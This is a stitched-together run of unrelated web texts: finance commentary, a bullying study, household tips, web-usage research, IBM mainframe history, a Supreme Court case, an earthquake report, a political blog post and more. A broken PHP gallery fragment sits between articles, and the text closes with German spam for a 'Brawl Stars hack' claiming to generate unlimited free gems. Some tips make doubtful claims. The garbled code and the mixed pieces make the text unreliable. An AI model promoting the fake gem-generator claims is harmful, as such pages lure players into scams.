Milken , by contrast , claimed it was another example of highly regulated banks doing stupid things , just like in the sovereign debt crisis of the late 1970s ( conveniently forgetting the role Wall Street played in structuring and selling the product , and in repeated and aggressively contacting mortgage orginators and telling them they wanted more product ) .
Milken also maintained that the government should not get involved , the private sector could do a far better job of handling this , again conveniently ignoring the massive subsidies extended by the Fed via negative real interest rates on the short end of the yield curve and an alphabet soup of new facilities .
I could go on , but you get the point .
An article earlier this week in the Financial Time by Abigail Hofman focused on the deeply - seated cultural issues that produced the crisis :
I worked for 18 years in investment banking and several aspects of the culture unnerved me .
Investment banks are all about making money .
At the extreme , this means making money for employees not shareholders .
The big revenue producers are revered .
It is not considered prudent to upset them by asking too many questions .
The subprime meltdown is a perfect example of the “ emperor has no clothes ” phenomenon .
These were complex products , yet obfuscation was considered acceptable .
Bank chief executives should have asked more questions .
I suspect they saw the juicy profits and hoped underlings understood the risks .
Moreover , investment banking culture has a cult aspect to it .
If you work on Wall Street or in the City , you toe the party line .
Despite lip - service to “ diversity ” , diversity of thinking is not encouraged .
This atmosphere of craven conformity breeds at first complacency and then mistakes .
The Milken conference provided vignettes of how to cultivate conformity : select the likeminded , or at least sympathetic , for high profile roles , and apply subtle and not so subtle pressure to make sure they stay within approved boundaries .
But as Hofman ’s comments suggest , this is n’t a Milken conference problem ; rather , the conference illustrated certain behaviors found widely in the financial services industry ( note also that , at least in my day , most firms were agnostic about their staff ’s political leanings ) .
A long time ago at McKinsey , one paradigm they mentioned was that people fell somewhere on the spectrum of internalizers and externalizers .
Internalizers tend to blame themselves for what happens whether it was their fault or not .
They are very conscientious and strive not to repeat their errors .
Externalizers blame everyone else for their problems .
They are very resilient and well suited to sales jobs .
And they are incapable of learning from their mistakes , since they never make any .
Click to view
It 's always sad when a store you used to frequent goes out of business , but how about when that store used to mark up its prices like mad ?
Things become slightly less sad .
Nevertheless , this desolate scene at a Portland CompUSA definitely brings a slight tear to our eye .
Reader Russ went in for some " last gasp " deals , but there 's pretty much nothing left , aisles and displays having been long torn down .
He tells us that if there 's a store closing near you , you might be able to nab 40 % off some Xbox or PSP games as well .
Bonus shot after the jump .
Advertisement
[ Thanks Russ ! ]
Spreading rumors and gossiping may not cause bruises or black eyes , but the psychological consequences of this social type of bullying could linger into early adulthood , a new University of Florida study shows .
In a study of 210 college students , UF researchers discovered a link between what psychologists call relational victimization in adolescence and depression and anxiety in early adulthood , according to findings published online in April in the journal Psychology in the Schools .
Rather than threatening a child with physical violence , these bullies target a child 's social status and relationships by shunning them , excluding them from social activities or spreading rumors , said Allison Dempsey , a doctoral student in the UF College of Education and the study 's lead author .
" Even though people are outside of high school , the memories of these experiences continue to be associated with depression and social anxiety , " said Dempsey , who graduated from Columbine High School in Colorado one year before the 1999 school shooting there and now studies school prevention programs .
" It was interesting to see these relationships still continue to exist even though they are in early adulthood now and in a completely different setting .
" I 'm hoping this study will help shed light on the fact that this is a real problem and continues to be a real problem after students leave school . "
To uncover the relationships between social bullying and loneliness , depression and anxiety , researchers surveyed college undergraduates between the ages of 18 and 25 and asked them to recall their experiences from high school .
They were also looking to see if having friends mitigated some of the effects of bullying and if there was any relationship between gender and the severity of psychological symptoms , said Eric Storch , Ph.D. , an assistant professor of psychiatry in the UF College of Medicine and a co-author of the study .
" About 20 years ago people thought of bullying as very physical , " Storch said .
" As a result people thought guys did the bullying , and that it was n't really a big experience for girls .
The problem is that is n't actually true .
There are different types of aggression .
advertisement
" Boys do tend to be more physical , but both sexes engage in relational victimization .
We wanted to see if gender affected strength of the relationship between depressive symptoms and victimization . "
But researchers found no gender difference in the link between this type of bullying and depression .
They also discovered that having friends or other positive social relationships did n't lessen rates of depression and anxiety in adulthood , a finding that surprised them , Dempsey said .
For some children , having friends and positive support can help make them more resilient to the slings and arrows from bullies , Storch said .
But other children take the words and abuse more to heart and begin to believe what 's being said about them .
" Those types of negative thoughts are actually believed to be at the core of things like depression and anxiety , " Storch said .
" Behaviorally what starts happening is you avoid interactions and situations that could be quite positive for you . "
Currently , there are few prevention or intervention programs that focus specifically on relational victimization , in part because it 's tougher to pinpoint and stop , Dempsey said .
advertisement
" If a child tries to punch someone or kick someone , there 's evidence of that happening , " Dempsey said .
" There 's a definite aggressor and a definite victim .
When it comes to spreading rumors and gossiping , that 's a lot more difficult to prove who 's doing it .
And it 's harder to provide consequences . "
Dempsey said she hopes this study and others will help other researchers and psychologists design programs that can help stop this form of bullying in schools .
" I think many people have the belief that victimization is a normal rite of passage in childhood , " Storch said .
" While it certainly does happen to most kids , it 's not acceptable .
And while I think it would be difficult to completely curtail it , by reducing it you 're going to help someone a tremendous amount to not have to go to school and be plagued by this environment of being tortured day in and day out .
" This is n't a normative experience and we need to do something about it and recognize that not doing something could affect children who are really rising stars . "
Wendy Troop - Gordon , Ph.D. , an assistant professor of psychology at North Dakota State University , said understanding how past relational bullying affects people in adulthood is an important step forward for research in this field .
" Turning 18 is not a magical age when you leave all of these experiences behind , " said Troop - Gordon , who is not affiliated with the study .
" People do seem to carry these experiences with them . "
I received this as an email and instead of saving the email , I decided to post it here so that I know I always have these great tips on my site .
I plan on trying every single one of them too .
I actually just tried the dryer tip ( # 17 ) at the bottom , so we ’ll see how that one works out .
Oh yeah , I probably wo n’t be trying the hair conditioner on my legs for shaving either since , well …I ’m a guy .
A lot of these tips are things that I can actually use on a regular basis too .
1. Reheat Pizza
Heat up leftover pizza in a nonstick skillet on top of the stove , set heat to med - low and heat till warm .
This keeps the crust crispy .
No soggy micro pizza .
I saw this on the cooking channel and it really works .
2. Easy Deviled Eggs
Put cooked egg yolks in a zip lock bag .
Seal , mash till they are all broken up .
Add remainder of ingredients , reseal , keep mashing it up mixing roughly , cut the tip of the baggy , squeeze mixture into egg .
Just throw bag away when done easy clean up .
3. Expanding Frosting
When you buy a container of cake frosting from the store , whip it with your mixer for a few minutes .
You can double it in size .
You get to frost more cake / cupcakes with the same amount .
You also eat less sugar and calories per serving .
4. Reheating Refrigerated Bread
To warm biscuits , pancakes , or muffins that were refrigerated , place them in a microwave with a cup of water .
The increased moisture will keep the food moist and help it reheat faster .
5. Newspaper Weeds Away
Start putting in your plants , work the nutrients in your soil .
Wet newspapers put layers around the plants overlapping as you go cover with mulch and forget about weeds .
Weeds will get through some gardening plastic they will not get through wet newspapers .
6. Picking Up Broken Glass
Use a wet cotton ball or Q - tip to pick up the small shards of glass you ca n’t see easily .
7. No More Mosquitoes
Place a dryer sheet in your pocket .
It will keep the mosquitoes away .
8. Squirrel Away !
To keep squirrels from eating your plants sprinkle your plants with cayenne pepper .
The cayenne pepper does n’t hurt the plant and the squirrels wo n’t come near it .
Update : I ’ve heard from several people that using cayenne pepper can be dangerous to many animals , especially if they get it in their eyes .
I ’ve read recommendations of diluting the pepper in soapy water and spraying it on leaves to make it safer .
9. Flexible Vacuum
To get something out of a heat register or under the fridge add an empty paper towel roll or empty gift wrap roll to your vacuum .
It can be bent or flattened to get in narrow openings .
10 . Reducing Static Cling
Pin a small safety pin to the seam of your slip and you will not have a clingy skirt or dress .
Same thing works with slacks that cling when wearing panty hose .
Place pin in seam of slacks and — ta da ! — static is gone .
11 . Unsticky Measuring Cups
Before you pour sticky substances into a measuring cup , fill with hot water .
Dump out the hot water , but do n’t dry cup .
Next , add your ingredient , such as peanut butter , and watch how easily it comes right out .
12 . Foggy Windshield ?
Hate foggy windshields ?
Buy a chalkboard eraser and keep it in the glove box of your car .
When the windows fog , rub with the eraser !
Works better than a cloth !
13 . Reopening Envelopes
If you seal an envelope and then realize you forgot to include something inside , just place your sealed envelope in the freezer for an hour or two .
Voila !
It unseals easily .
14 . Smoother Legs With Conditioner
Use your hair conditioner to shave your legs .
It ’s a lot cheaper than shaving cream and leaves your legs really smooth .
It ’s also a great way to use up the conditioner you bought but did n’t like when you tried it in your hair …
15 . Goodbye Fruit Flies
To get rid of pesky fruit flies , take a small glass fill it 1/2 ″ with Apple Cider Vinegar and 2 drops of dish washing liquid , mix well .
You will find those flies drawn to the cup and gone forever !
16 . Get Rid of Ants
Put small piles of cornmeal where you see ants .
They eat it , take it “ home ” , ca n’t digest it so it kills them .
It may take a week or so , especially if it rains , but it works & you do n’t have the worry about pets or small children being harmed !
17 . Info About Clothes Dryers
The heating unit went out on my dryer !
The gentleman that fixes things around the house for us told us that he wanted to show us something and he went over to the dryer and pulled out the lint filter .
It was clean .
( I always clean the lint from the filter after every load clothes . )
He told us that he wanted to show us something ; he took the filter over to the sink , ran hot water over it .
The lint filter is made of a mesh material – I ’m sure you know what your dryer ’s lint filter looks like .
WELL … the hot water just sat on top of the mesh !
It did n’t go through it at all !
He told us that dryer sheets cause a film over that mesh that ’s what burns out the heating unit .
You ca n’t SEE the film , but it ’s there .
It ’s wha t is in the dryer sheets to make your clothes soft and static free – that nice fragrance too , you know how they can feel waxy when you take them out of the box , well this stuff builds up on your clothes and on your lint screen
This is also what causes dryer units to catch fire & potentially burn your house down with it !
He said the best way to keep your dryer working for a very long time ( & to keep your electric bill lower ) is to take that filter out & wash it with hot soapy water & an old toothbrush ( or other brush ) at least every six months .
He said that makes the life of the dryer at least twice as long !
How about that !?!
Learn something new every day !
I certainly did n’t know dryer sheets would do that .
So , I thought I ’d share !
Note : I went to my dryer & tested my screen by running water on it .
The water ran through a little bit but mostly collected all the water in the mesh screen .
I washed it with warm soapy water & a nylon brush & I had it done in 30 seconds .
Then when I rinsed it the water ran right thru the screen !
There was n’t any puddling at all !
That repairman knew what he was talking about !
Nielsen : " Search engines rule the web "
Web users are getting more ruthless and selfish when they go online , reveals research .
The annual report into web habits by usability guru Jakob Nielsen shows people are becoming much less patient when they go online .
Instead of dawdling on websites many users want simply to reach a site quickly , complete a task and leave .
Most ignore efforts to make them linger and are suspicious of promotions designed to hold their attention .
Search rules Instead , many are " hot potato " driven and just want to get a specific task completed .
Success rates measuring whether people achieve what they set out to do online are now about 75 % , said Dr Nielsen .
In 1999 this figure stood at 60 % .
There were two reasons for this , he said .
" The designs have become better but also users have become accustomed to that interactive environment , " Dr Nielsen told BBC News .
Now , when people go online they know what they want and how to do it , he said .
Beating Google requires someone to do search better
This makes them very resistant to highlighted promotions or other editorial choices that try to distract them .
" Web users have always been ruthless and now are even more so , " said Dr Nielsen .
" People want sites to get to the point , they have very little patience , " he said .
" I do not think sites appreciate that yet , " he added .
" They still feel that their site is interesting and special and people will be happy about what they are throwing at them . "
Web users were also getting very frustrated with all the extras , such as widgets and applications , being added to sites to make them more friendly .
Such extras are only serving to make pages take longer to load , said Dr Nielsen .
There has also been a big change in the way that people get to the places where they can complete pressing tasks , he said .
In 2004 , about 40 % of people visited a homepage and then drilled down to where they wanted to go and 60 % use a deep link that took them directly to a page or destination inside a site .
In 2008 , said Dr Nielsen , only 25 % of people travel via a homepage .
The rest search and get straight there .
" Basically search engines rule the web , " he said .
But , he added , this did not mean that the search engines were doing a perfect job .
" When you watch people search we often find that people fail and do not get the results they were looking for , " he said .
" In the long run anyone who wants to beat Google just has to make a better search , " said Dr Nielsen .
E-mail this to a friend Printable version Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
'.$images [ $ _GET [ " img " ] ] [ filename ] . '
up next >>
<< prev up
<< prev up next >>
'.$_page_title_ . '
' ; if ( $_GET [ " no " ] == " " ) $ no = 1 ; else $ no = $ _GET [ " no " ] ; $ index=abs ( $ no -1 ) *$_no_pics_per_page_ ; if ( ( $ noimage - $index ) ' ; for ( $b = 1 ; $b<=$_no_cols_ ;$b++ ) { if ( $images [ $index ] [ filename ] != '') { echo ' ' ; if ( $_filename_ ) echo ' '.$images [ $index ] [ filename ] . '
' ; echo ' '; $ index ++ ; } else echo ' '; } echo ' '; } echo '
' ; for ( $i=1 ; $i<=$ nopos ; $i++ ) { if ( $i == $ no ) echo ' '.$ i.' '; else echo ''.$i.' '; } echo '
All images in gallery : '.count ( $images ) .'
Created by QuickGallery
Disk drives are extraordinarily resilient .
I 've seen one that had been run over , dropped in a toilet and then thrown out of the window of a seven - storey office block .
It looked unusable .
Kroll Ontrack managed to recover virtually all the data on it by drying it and taking it apart .
Hard disk crusher
Clam shell casings are very strong and deleting data does n't work effectively , and passing magnets over the disk is n't sure enough .
Even repeated writing of zeroes is n't necessarily effective and certainly takes a long time .
So , if you really , seriously , want to render your hard drive unreadable and have n't used major league encryption of all its contents then what can you do ?
Drill the little sucker right through its spindle heart is one answer .
EDR Solutions sells a machine to do just this .
It 's inaccurately called the Hard Disk Crusher but it does n't crush the drive .
Instead it drills through the spindles and this creates ripples in the platters rendering them effectively unreadable .
It can destroy the readability of disk drives at the rate of 60 an hour , taking 10 seconds once the disk is clamped in place .
One EDR customer rendered 800 unreadable in just one day .
The machines costs $ 11,500 , which includes a one - year warranty ( return to factory ) .
More information here ® .
© 2008 Blocks & Files.com
The IBM System / 360 mainframe was the darling and the workhorse of its day .
McKnight / AP __1964 : __ IBM unveils the System / 360 line of mainframe computers .
It was a daring innovation that transformed business , science , government and the IT industry itself .
Computing was changing fast , which befuddled a lot of businesses .
They knew they needed " electronic brains " to compete , but were reluctant to invest in more than they needed , or in systems they could n't expand later , or that would n't operate well with their other computers and equipment .
In what some consider the biggest business gamble of all time , the International Business Machines Corp. invested $ 5 billion ( $ 34 billion in today 's dollars ) in a family of six mutually compatible computers and 40 peripherals that could work together and be expanded in multiple combinations .
System /360 components included the CPU , control unit , display terminal , printer , data - cell storage , drum storage , disk storage and DASD control unit , tape storage , a tape control unit , card reader - card punch combination , console station and console typewriter .
All these elements worked with one another and with previous – and future – IBM equipment .
They all used the same command set , or pretty near .
The buyer could buy a small or low - performance system at low cost and upgrade later .
System /360 was the benchmark for mainframe performance for many years .
It also introduced the de facto worldwide standard of the 8 - bit byte , rendering 12 - bit and 36 - bit computers obsolete almost overnight .
The first production models were n't delivered until 1965 .
By 1966 , IBM was selling a thousand systems a month , at $ 2.5 to $ 3 million ( $ 20 million today ) each .
Big Blue 's bet paid big .
Wired.com summarized the System / 360's impact on its 40th anniversary :
System /360 was the world 's first mainframe , and its introduction opened the door to a new era of computing in which , for the first time , it was possible to perform a million instructions per second .
Even the lower - end models in the System / 360 line were capable of 75,000 instructions per second .
And this newfound power , at prices most sizable businesses could afford , helped the banking and insurance industries , not to mention many others , move into a more modern age .
Indeed , author James Collins has written that the System / 360 , along with Ford 's Model T and the Boeing 707 jet , were the three most important business innovations of all time .
It 's worth noting that today 's laptops are faster than the early 360s .
Source : Various
Slideshow : Big Blue Marks Birth of Big Iron
April 7 , 1969 : Birth of That Thing We Call the Internet
Jan. 29 , 1964 : Duck and Cover
July 31 , 1964 : Ranger 7 Keeps Shooting Until the Very Last Second
If a city allows a monument with the Ten Commandments to be erected in a public park , must it also allow other religions and groups to display monuments of their choosing ?
The Supreme Court agreed Monday to take up that question in an unusual dispute over the reach of the 1st Amendment and freedom of speech .
In the past , the court has said the free - speech rule applies in parks and officials may not discriminate against speakers or groups because of their message .
In this context , freedom of speech means a freedom from government restrictions .
But last year , the U.S. appeals court in Denver extended this free - speech rule to cover the monuments , statues and displays in a public park .
It ruled in favor of a religious group called Summum , which says it wants to erect its “ Seven Aphorisms of Summum ” next to the Ten Commandments in Pioneer Park in Pleasant Grove , Utah .
Its ruling left the city with an all - or - nothing choice : Allow Summum and others to erect their own displays in the park , or remove the other monuments .
Advertisement
The city ’s lawyers called the appeals court ruling “ confused ” and “ flawed ” and said it could cause problems around the nation .
“ We ’re delighted that the Supreme Court agreed to take this critical case , ” said a statement by Jay Sekulow , chief counsel for the conservative American Center for Law and Justice , which filed an appeal for Pleasant Grove .
He continued : “ The lower court ruling -- if left unchecked -- would ultimately force local governments to remove long - standing and well - established patriotic , religious and historical displays . ”
Sekulow argued that monuments are the property of the city and are not akin to private free speech .
Advertisement
But the Rev. Barry W. Lynn , executive director of the liberal Americans United for Separation of Church and State , said Pleasant Grove invited problems by allowing the Ten Commandments monument .
“ If government creates an open forum , it ca n’t pick and choose among religions , ” Lynn said in a statement .
When the Supreme Court has taken up the Ten Commandments in the past , it has done so to decide whether a city or state display violates the 1st Amendment ’s bar against “ an establishment of religion . ”
In 2005 , the court issued split decisions .
It upheld a 4 - decade - old granite monument displaying the Ten Commandments that sat among other statues and monuments on the grounds of the Texas Capitol .
However , in a separate ruling on the same day , it struck down a move by county officials in Kentucky to display the commandments in courthouses .
Advertisement
The court will hear Pleasant Grove City vs. Summum in the fall .
--
david.savage@latimes.com
An earthquake registering 5.3 on the Richter Scale was felt by residents across Israel at 12:36 pm Friday .
The trembling lasted for 19 seconds and shook structures in many major towns and cities .
Reports of shaking were received from Nahariya in the north down to Beersheba .
Magen David
Adom emergency services said there were no reports of injuries , but several people suffered from shock .
Warning Top official : Police unprepared for mass disaster Zvi Lavi
In face of grim earthquake casualty estimations , police warns forensic teams incapable of dealing with large - scale national disaster ; officials ask for $ 9.8 million to set up national biometric database to simplify identification process , equip labs Top official : Police unprepared for mass disaster
The quake 's epicenter was located 15 kilometers ( 10 miles ) northeast of the Lebanese town of Tyre , or 70 km ( 45 miles ) northeast of Haifa .
" It was really cool .
The quake was pretty strong , " Shahaf Cohen of Haifa told Ynet .
" Everything in our house shook ; so did the house itself .
A few aftershocks followed the initial quake .
It lasted for about 20 seconds . "
Shai Hadad of Petah Tikva was working at his computer when the quake hit .
" The chair and bed moved from side to side .
The felt another weaker quake , " he said .
The quake was the strongest to hit Israel in a decade .
The earthquake also shook Beirut , other parts of Lebanon and the Syrian capital of Damascus .
Residents in some areas of Beirut left their apartments and went into the street after the first jolt shortly after midday , which lasted a few seconds .
A Lebanese man and two Palestinians were injured in Tyre when a balcony fell on top of them , the Lebanese National News Agency reported .
Residents of Damascus , the Syrian capital about a 2 - hour drive away , reported feeling the quake as well .
There was no word on the magnitude , but it appeared to be a small quake .
On Monday night , a mild earthquake measuring 4.0 on the Richter Scale was felt across Israel , from Kiryat Shmona in the north to the Jerusalem area .
Police and emergency centers in the north were flooded with phone calls from concerned citizens wishing to report the quake .
' Almost nothing being done in Israel '
Despite the recent quakes , experts explain that this does not indicate that a stronger earthquake is expected any time soon .
" This does not testify to an increase or a slowdown .
In any case , we must take note of the situation , regardless of what happened , " Dr. Dr. Ephraim Laor , who headed the steering committee appointed to prepare for earthquakes , told Ynet on Friday .
Thousands of earthquakes and seismic activities are felt across the world every year , some of them affecting nearby areas .
One of them was Friday 's quake , whose epicenter was located in southern Lebanon .
Despite the fact that earthquakes have claimed the lives of hundreds of thousands of people over the past century , it is still impossible to predict when a strong quake will take place .
Dr. Laor presented as an example the earthquake which took place in Iran in 2003 , leaving more than 40,000 people dead .
" The quake was in a place where there had not been one movement in more than 2,000 years , " he said .
And what is Israel doing in order to prepare for such a quake .
According to Dr. Laor , almost nothing .
" Work has been done , but it was almost stopped completely following the Second Lebanon War .
It has hardly been resumed , and I hope now it will be resumed , " he added .
Dr. Laor noted that apart from reinforcing buildings , Israel must keep in touch with its neighboring countries and international organizations , as a disaster in the country is expected to claim the lives of some 16,000 people .
The Geophysical Institute of Israel reported that several areas in Israel were prone to earthquakes , including the Great Rift Valley which stretches along the Jordanian border .
" There are seismogenic areas in Israel where the likelihood for an earthquake is much greater than in other areas across the country .
In general , the area which generates earthquakes is the Dead Sea Rift , but there are also other areas which suffer from quakes from time to time , like the southern Lebanon area , " explained Dr. Uri Frieslander , the institute 's director - general .
Dr. Frieslander believes that Friday 's quake had nothing to do with the 7.3 - magnitude quake which took place in Greece on Thursday .
New Hampshire Governor Approves More Sin Taxes
Cross posted on Grizzly Groundswell
I am not even going to bore you again here with the details of New Hampshire ’s budget woes other than to say that liberal Governor John Lynch vastly outspent the state ’s incoming revenue by a projected $ 200 million plus .
If you are so inclined you can read more about New Hampshire ’s deficit here .
What I do want to write about is what Governor Lynch has decided is the best way to cope with the impending crash of New Hampshire ’s economy .
Has he decided to cut spending ?
Only to a small extent .
Has he decided to raise taxes ?
BINGO .
Sin taxes .
Gov. John Lynch proposed Thursday raising the cigarette tax 25 cents a pack and cutting a discount that retailers get for wine they buy from the state .
Lynch told the House Finance Committee he also supports a 10 percent tax on Texas Hold ‘ Em poker games
Governor Lynch justifies his increase in the cigarette tax by saying in effect , we are n’t raising our cigarette tax as much as Maine or Massachusetts .
Lynch said Massachusetts and Maine are considering raising their tax rates , which will make New Hampshire ’s prices attractive even with a hike in its tax
This is like a third grade mentality .
He feels that , sure we may be doing something wrong ( raising taxes ) but we are n’t as bad as our neighbors .
So immature an argument .
I know you are , but what am I ?
So tobacco users are going to pay once again , but what other group will also pay more ?
Lynch also wants to cut in half a 20 percent discount given to outlets that buy wine from the state .
The cut would save the state about $ 10 million .
Who do you think will have to pay for the 10 % increase in the price of wine that outlets will now incur ?
Because that is what a decrease in a discount amounts to , an increase in price .
Hint : it wo n’t be the outlets .
Then there will be the new tax on playing poker , a 10 % tax on Texas hold ’em games held by organizations such as the VFW for fundraising purposes .
Here is a statement made by the house minority leader :
“ Rather than looking for reasonable places to reduce the bloated budget passed last year and bring it into line with our rising revenues , the governor and Democratic leaders of both the House and Senate want to raise still more taxes and fees , ” said Deputy House Republican Leader David Hess .
More Republican response :
Rep. David Hess , R-Hooksett , pointed out that revenues this year are $ 76 million ahead of last year , up 3.8 percent .
“ The bottom line is not that we have a revenue problem , it ’s that we have a spending problem , ” Hess said .
I am gong to say it once again : NEW HAMPSHIRE WAKE UP !
We ca n’t afford another term of Governor Lynch and we certainly can’t afford another term with Democrats in charge of every branch of the state government .
We are being spent into oblivion by Lynch and his cronies .
We are being taxed to death .
We need to remove this irresponsible tax and spend liberal from office .
These are just the first of many tax increases .
Do you think that spending will be curbed under this administration ?
Wrong .
We are talking about a $ 200 million plus shortfall here , without even including the disastrous education funding that the governor did n’t have the balls to estimate a cost on .
These taxes may not affect you , but they wo n’t end here .
You have to ask yourself , are you a sinner ?
If you are , watch out , the governor will come for you eventually .
What is your vice ?
Whatever it is , it will soon cost you more .
WAKE UP NEW HAMPSHIRE , WAKE UP !
It may already be too late .
I hope not .
Read more here .
The Noordbrabants Museum , one of the main modern art museums in southern Netherlands , opened recently an exhibit “ Fantasy Factory ” , where BBB has a permanent display .
This morning , the Dutch national news paper Volkskrant posted a positive review on this exhibit , ending with some words about BBB .
Freely translated :
“ From paper cutting to fast 3D - film ”
“ Radically different than for example the model - handicraft from van Kaayk , is Big Buck Bunny from the Netherlands computer graphics teacher Sacha Goedegebure , a comedy about a fat rabbit taking revenge on three irritating rodents .
The film – in the fastest imaginable 3D computer animation – almost seems like being produced by Blue Sky studios , the producer of Ice Age 1 - 2 - 3 , so natural and precise as the rabbit hairs wave in the wind .
Gosh , that we can do this too , you then think a while .
And understandable that the eyes of the kids hanging in the beanbags of the theatre are glued on this Dutch rabbit humour . ”
Ai n’t this a fun review ! :)
Kudos to all who made BBB of course , it ’s certainly not just a Dutch film … but we knew that !
- Ton -
Soziale Anteile
BRAWL STARS HACK CHEATS – KOSTENLOSE JUWELEN
Brawl Stars ist eine weitere Produktion , die von Supercell , dem größten Entwickler für mobile Spiele , Clash Royale und Clash of Clans veröffentlicht wurde .
Wer schon mal Handyspiele gespielt hat , sollte wissen , wie groß diese Produktionen waren .
Seit die Veröffentlichung von Clash Royale seit einem Jahr vorbei ist ( ganz zu schweigen von Clash of Clans ) , hat das Label die Rolle übernommen , etwas Neues zu erschaffen ( und zwar , denn jedes von Supercell veröffentlichte Spiel war immer erfolgreich ) .
So war der Brawl Stars Hack .
Was ist das ?
Was ist los in diesem Spiel ?
Sie werden es für einen Moment herausfinden .
WAS IST ES DIE BRAWL STARS ?
Dies ist natürlich ein Spiel ähnlich CR und COC .
Im Spiel erstellen wir ein Mannschaft und kämpfen 3 vs 3 in Echtzeit .
The Brawl Stars Hack :
Kopfgeld – In diesem Modus sammeln wir Sterne für unser Mannschaft , indem Sie Gegner eliminieren .
Trotzdem müssen wir vorsichtig sein .
Das Mannschaft , das mehr Sterne bekommt , gewinnt das Spiel .
Schlagen und nehmen – So sammeln Sie Kristalle aus der Kartenmitte .
Das Mannschaft gewann die ersten 10 Kristalle gewinnt das Spiel .
Heist – geh in einen Safe , der von der gegnerischen Mannschaft geschützt wird , oder du kannst deine Wertgegenstände verteidigen .
Du hast ein paar Minuten Zeit zu erraten , wer mit der ganzen Beute weggeht !
Showdown – 10 Spieler fallen in die Arena , vielleicht bist du der Letzte ?
BRAWLS STARS HACK UND TIPPS
Sammle eine Menge Münzen , Elixier und Chips im Spiel , um neue Brawler zu verbessern und freizuschalten .
Treten Sie dem Team bei und teilen Sie Rollen .
Spiele und kämpfe strategisch mit anderen Spielern .
Gute Taktik ist die Basis !
Dies wird Ihnen definitiv helfen , an die Spitze der lokalen und regionalen Ranglisten zu gelangen .
Auf diese Weise können Sie beweisen , dass Sie ein wahrer Brawl Star sind !
WAS IST BRAWL STARS Cheats ?
Brawl Stars Cheats ist eine Anwendung , die Ihnen hilft , den Shop im Spiel zu umgehen .
Mit dieser einfachen Anwendung können Sie unbegrenzte JUWELEN erhalten .
Anstatt im Geschäft zu kaufen und viel echtes Geld auszugeben , können Sie mit unserer Anwendung unbegrenzte JUWELEN zu Ihrem Konto hinzufügen .
Alles mit ein paar Klicks .
Es ist wirklich kindisch .
Ich werde nicht beschreiben , wie man Brawl Stars Hack - JUWELEN benutzt , denn sobald man die Anwendungen aktiviert hat , wird man wissen , was man selbst machen wird .
Es funktioniert wirklich !
Warten
Sie nicht länger , schauen
Sie doch mal rein !
BRAWL STARS UNLIMITED GEMS – FUNKTIONIERT DER HACK ?
Ja , Brawl Stars
Hack ist eine Anwendung , die wirklich funktioniert und Tonnen von Edelsteinen für Ihr Konto generieren kann .
Als Beweis stelle ich Ihnen Screenshots aus unserem Edelsteinprogramm vor .
Es funktioniert wirklich !
Es gibt nichts , worüber Sie sich Sorgen machen müssen , probieren Sie einfach mal aus , wie Brawl Stars Cheats auf Ihrer eigenen Haut aussehen !
EIGENSCHAFTEN VON BRAWL STARS SPIELE
Bekämpfe 3 vs 3 in Echtzeit .
Wir kämpfen gegen Spieler aus aller Welt
Wir schalten neue Schlägereien frei , die jeweils unterschiedliche Fähigkeiten haben
4 einzigartige und verschiedene Spielmodi
Wir können alleine mit unseren Freunden kämpfen , die Wahl liegt bei Ihnen !
Möglichkeit , der Beste der
Welt zu sein .
Alle durch Rankings , die ständig aktualisiert werden !
Brawl Stars Hack – eine Anwendung , die unbegrenzte Edelsteine bekommen wird !
Einfach zu gebrauchen
Nachfolger von zwei Treffern
Die besten Entwickler von Handyspielen
Und viele andere
HEROES IN DEN BRAWL STARS UND IHRE FÄHIGKEITEN
Bo – ein Charakter , der eine Distanz kämpft , schießt mit Pfeilen .
Seine besondere Fähigkeit besteht darin , Bomben in einen Bereich zu werfen , der nach einem Moment explodiert .
Sehr guter Charakter .
Ricochet – seine Kugeln prallen von Wänden , was für seinen Rivalen sehr unberechenbar ist .
Crow – ist ein kleiner Junge , dessen Spezialität es ist , eine Art Rakete zu schießen , die im Laufe der Zeit Verletzungen verursacht .
Außerdem hat er super Fähigkeiten , die ihm erlauben , schnell in die Arena zurückzukehren .
Poco – ein Gitarrenskelett , das die Melodie tötet .
Seine besondere Fähigkeit besteht darin , seine Teamkollegen zu behandeln , während er seine Gegner verletzt , alles mit einem Schuss .
Spike – ein Kaktus , der Spikes wirft .
Mordis – fügt Schaden durch Schlagen der Schaufel zu .
Seine besondere Fähigkeit ist die Fähigkeit , den Gegner schnell zu treffen .
Jessie – ist etwas geboren .
Neda – kann einen Bären anrufen , der 1200 PS hat .
Zurückgerufene Bären können Verletzungen zufügen , können aber keine Beute von ihnen sammeln .
El Primo – ein weiterer Panzer mit einem Leben von 1200 PS .
Verglichen mit dem Royal Giant .
MERKEN !
Brawl Stars ist ein Spiel , das kostenlos auf Android - und iOS - Plattformen verfügbar ist .
Sie können kostenlos spielen , aber einige Dinge im Spiel , wie zum Beispiel Edelsteine , können für echtes Geld im Laden gekauft werden .
Trotzdem müssen
Sie es nicht tun .
Diese Funktion ist nur für die Willigen .
Wenn
Sie keine unbegrenzten Edelsteine kaufen möchten , deaktivieren Sie einfach die Store - Funktion in Ihren App - Einstellungen .
WIE MAN SPIELT UND WIE BRAWL STARS HACK GEMS HERUNTERLADEN ?
( TUTORIAL FÜR IOS )
Wie Sie wissen , steht das Spiel derzeit nur kanadischen Spielern zur Verfügung .
Es gibt jedoch verschiedene Möglichkeiten , es in anderen Teilen der Welt zu spielen .
Was müssen wir machen ?
Ich übersetze bereits .
– Bypass Apple Store – Standort ändern – um Brawl Stars Hack auf Apple - Geräten zu spielen , benötigen wir iOS 8 oder höher .
Außerdem müssen wir im App Store ein neues Konto erstellen , in dem wir das Land auswählen müssen , in dem das Spiel verfügbar ist .
In diesem Fall wird es Kanada sein .
– Installation des Spiels – Sobald wir Zugang zum kanadischen App Store haben , betreten wir das Geschäft und suchen nach den Brawl Stars .
Wenn wir es finden , installieren wir es wie jede andere Anwendung .
–VPN - Konfiguration – Dies ist wahrscheinlich der wichtigste Schritt .
Es geht darum , unseren Standort zu verändern .
Damit die Spielserver dachten , Sie wären tatsächlich in Kanada .
Laden
Sie dazu das Programm herunter und installieren Sie es – Opera VPN .
Stellen Sie dann die Standorte nach Kanada ein .
Dies ist ein Brawl Stars Hack , dank dem du jetzt in anderen Teilen der Welt einen neuen
Hit spielen kannst als Kanada .
Das ist wirklich sehr einfach und ich denke , die meisten von euch werden kein Problem damit haben .
Bald werde ich versuchen , ein ähnliches Tutorial auf Android zu präsentieren .
Ich hoffe jedoch , dass das Spiel in einigen Tagen in allen Regionen der Welt verfügbar sein wird , weil ich es nicht erwarten kann .
Schlägerei Sterne Hack kommt !
Brawl Stars – Wie man für Anfänger spielt
Was denkst du über die neue Supercell - Produktion ?
